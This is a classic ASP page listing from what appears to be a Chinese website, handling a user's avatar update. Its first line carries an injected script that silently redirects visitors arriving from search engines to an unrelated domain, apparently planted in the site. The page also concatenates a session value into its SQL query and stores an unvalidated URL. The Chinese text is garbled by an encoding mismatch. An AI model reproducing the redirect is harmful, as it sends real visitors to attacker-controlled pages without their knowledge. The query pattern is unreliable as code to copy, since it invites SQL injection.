d:\wwwroot\wuchunhua\ͨѶ¼\zlx\tou_ok.asp

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><!--#include file="chklogin.asp"-->
002: <!--#include file="conn.asp"-->
003: <%
004: url=Request("R1")
005:
006: set rs=server.createobject("adodb.recordset")
007: sql="select * from [user] where name='" + Session("name") + "'"
008: rs.open sql,conn,3,3
009: If (rs.bof) or (rs.eof) then
010:    rs.close
011:    Set rs=nothing
012:    Response.Redirect "../error.asp?id=Session ±äÁ¿³ö´í,ÇëÖØÐµÇ½£¡"  
013: Else
014:   rs("pic")=url
015:   rs.Update
016:   rs.Close
017:   set rs=nothing
018:   Response.Redirect "../ok.asp?id=Í·ÏñÉèÖóɹ¦£¡"  
019: End if
020: %
>
021:
022: